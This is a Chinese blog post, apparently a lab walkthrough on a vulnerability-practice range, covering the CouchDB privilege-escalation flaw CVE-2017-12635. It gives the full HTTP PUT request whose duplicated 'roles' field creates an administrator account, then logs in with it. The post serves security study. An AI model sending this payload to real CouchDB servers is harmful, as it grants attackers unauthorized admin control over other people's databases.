中间件安全(二)

已于 2024-09-21 16:37:27 修改
阅读量695 收藏 4
点赞数 4
分类专栏: 中间件漏洞 文章标签: 安全
于 2024-09-19 17:05:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_80280669/article/details/142363236
版权

本文仅作为学习参考使用,本文作者对任何使用本文进行渗透攻击破坏不负任何责任。

前言:

前文链接:中间件安全(一)

本文主要讲解Couchdb数据库未授权越权漏洞(CVE-2017-12635)。

靶场链接:Vulfocus 漏洞威胁分析平台

一,靶场界面简介。

可以看到开放了三个端口,尝试后发现,仅http://123.58.224.8:35469 可以打开,打开后界面如下:

并无什么有价值的信息。

点击原始数据后,可以发现确实为Couchdb数据库,并且版本为:2.1.0(注意CVE-2017-12635影响版本:小于 1.7.0 以及 小于 2.1.1)。

访问/_utils目录。

couchdb/_utils目录简介:

可以看到,网页自动跳转到登录界面。

二,进行攻击。

随机输入账号密码并使用bp进行抓包。

可以看到,登录失败。

右键,将其发送到重发器。

本漏洞可以绕过创建权限而去实现任意创建admin权限的账号 实现登录。

使用从数据包,正常新建用户:

POST /_session HTTP/1.1
Host: 123.58.224.8:47926
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 94

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "password": "vulhub"
}

失败。

使用绕过权限数据包:

PUT /_users/org.couchdb.user:vulhub HTTP/1.1
Host: http://123.58.224.8:47926
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 112

{
  "type": "user",
  "name": "vulhub",
  "roles": ["_admin"],
  "roles": [],
  "password": "vulhub"
}

成功。

使用账号密码(vulhub,vulhub)进行测试。

成功。

影•逝
关注
专栏目录
安全中间件次开发手册
12-13
安全中间件次开发手册》是一本专注于技术、经济、社会和客观因素融合的安全软件开发指导文献。在当今数字化时代,安全中间件扮演着至关重要的角色,它在系统架构中起到桥梁和保护屏障的作用,确保数据传输的安全...
“安鼎数据库安全访问中间件”简介.doc
06-04
6. 多级密钥管理:主密钥和主密钥变量存放在安全区域,级密钥加密保护数据加密密钥,确保密钥安全。 7. 安全备份:提供数据库明文备份和密钥备份功能,确保数据安全。 综上所述,“安鼎数据库安全访问中间件”是...
通过minio operator在k8s中部署minio tenant集群
小单的博客专栏
02-22 4022
MinIO是kubernetes原生的高性能对象存储,兼容Amazon的s3 API。MinIO Operator是一个工具,该工具扩展了k8s的api,可以通过minio operator在公有云和私有云上来部署MinIO Tenants本文就通过一步一步的操作,来演示如何在一个现存的k8s集群中部署一个minio集群。
网页中间件安全加固
jasonwgz的专栏
01-18 2852
一、APACHE WEB服务器软件,apache的程序名是httpd,服务的控制: systemctl start/stop/status httpd Apache是一个静态网站程序,不能直接支持动态页面;若要支持动态页面,则需要整合其它程序,如要支持PHP动态页面: yum install php-fpm php-common php-devel php-mysqlnd php-mbstring php-mcrypt 安装完后,记得重启服务,可以支持动态页面。 、独立的动态页面的支持程序: tomc.
网络安全-中间件漏洞
Triumph_01的博客
07-13 1356
中间件是一种独立的系统软件或服务程序,分布式应用软件借助这种软件在不同的技术之间共享资源。中间件位于客户机/服务器的操作系统之上,管理计算资源和网络通信。更加详细的中间件介绍可以参考这位作者的文章。
中间件安全
2201_75572825的博客
08-20 1444
Tomcat是一个开源的Java Servlet容器,它可以作为独立的Web服务器或应用服务器,也可以作为其他Web服务器的插件来使用,如Apache HTTP Server。Tomcat支持JavaServlet、JavaServer Pages (JSP) 、Java Expression Language (EL) 和WebSocket等Java技术,并提供了许多企业级特性,如集群、安全性和可扩展性。
中间件安全(apache、tomcat)
weixin_65049289的博客
03-31 1778
中间件漏洞利用
中间件安全】Nginx 安全加固规范
12-14 5322
1. 适用情况 适用于使用Nginx进行部署的Web网站。 2. 技能要求 熟悉Nginx配置,能够Nginx进行部署,并能针对站点使用Nginx进行安全加固。 3. 前置条件 1、 根据站点开放端口,进程ID,确认站点采用Nginx进行部署; 2、 找到Nginx安装目录,针对具体站点对配置文件进行修改; 3、 在执行过程中若有任何疑问或建议,应及时反馈。 4. 详细操作 4....
web中间件安全
qq_43590351的博客
04-12 4683
中间件漏洞
中间件安全】Tomcat 安全加固规范
12-14 6884
1. 适用情况 适用于使用Tomcat进行部署的Web网站。 2. 技能要求 熟悉Tomcat配置操作,能够利用Tomcat进行建站,并能针对站点使用Tomcat进行安全加固。 3. 前置条件 1、根据站点开放端口,进程ID,进程名称,确认站点采用Tomcat进行部署; 2、找到Tomcat路径: 方法一:开始->所有程序->Apache Tomcat->打开文件位...
【WebLogic】Oracle发布2024年第季度中间件安全公告
cnskylee的博客
04-17 1057
Oracle于美国时间2024年4月16日发布了 WebLogic 中间件2024年第季度的安全公告
级等保主机安全测评作业指导书-中间件Tomcat.pdf
07-11
根据提供的文件信息,本文将详细解析“级等保主机安全测评作业指导书-中间件Tomcat.pdf”中的关键知识点。 ### 一、级等保主机安全测评背景 在中国的信息安全管理体系中,“等保”即“等级保护”,是中国网络...
安全中间件次开发手册范本.doc
09-21
安全中间件次开发手册范本.doc
CVE-2024-1112 Resource Hacker 缓冲区溢出分析
信息安全
09-23 871
CVE-2024-1112 是 Resource Hacker 软件的一个缓冲区溢出漏洞。该漏洞存在于版本 3.6.0.92 中。由于软件在处理命令行中的文件路径时未对文件字符串长度进行限制,过长的字符串参数导致内存被过度写入,从而引发缓冲区溢出。
【中关村在线-注册/登录安全分析报告】
最新发布
09-23 877
中关村在线(ZOL)创立于1999年,深耕科技垂直领域23年,致力于新消费势力生活科技商品第一导购平台 ,专业高质量内容的提供者。以用户第一为导向,帮用户买好产品,帮客户卖好产品为使命利用专业领先内容,帮助用户更好、更快的选购产品, 通过产品解析、产品点评、问答口碑、对接电商,简化路径、产品评测完善+ 种草导购推荐等环节,让用户全面了解每一款产品性能,帮助用户更精准、更快捷的选购科技产品。
如何检测出来这个ip是共享ip不安全
KookeeyLena8的博客
09-23 463
检测一个IP是否为共享IP以及其安全性可以通过以下几种方法和工具来进行分析。共享IP通常是指多个用户共享一个IP地址,常见于公共代理服务器、VPN服务或数据中心IP。如果你想评估一个IP是否为共享IP以及其安全性,以下方法和工具可以帮助你进行检测和分析。
数据保护从现在开始:如何抵御 .[RestoreBackup@cock.li].SRC 勒索病毒
数据恢复研究℃
09-20 1122
通过综合采取以上预防措施,可以显著降低感染 .[RestoreBackup@cock.li].SRC 、[chewbacca@cock.li].SRC勒索病毒的风险。保持警惕、定期备份数据以及更新安全防护措施是确保数据安全的重要策略。预防永远胜于治疗,积极的安全态度是抵御网络攻击的最佳保障。以下是2024常见传播的勒索病毒,表明勒索病毒正在呈现多样化以及变种迅速地态势发展。
黎巴嫩BP机爆炸事件启示录:我国应加快供应链安全立法
09-21 1253
据报道,当地时间9月17日下午,黎巴嫩首都贝鲁特以及黎巴嫩东南部和东北部多地都发生了BP机爆炸事件。当时的统计数据显示,爆炸造成9人死亡,约2800人受伤。9月18日,死亡人数上升到11人,受伤人数超过4000。目前,整个事件仍在发酵之中,关于BP机是谁制造、谁运输、谁在其中动了手脚还在持续探索之中。这一事件也引发了人们对于供应链安全的广泛关注。供应链的任何环节,包括产品的源头、生产环节、运输过程...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值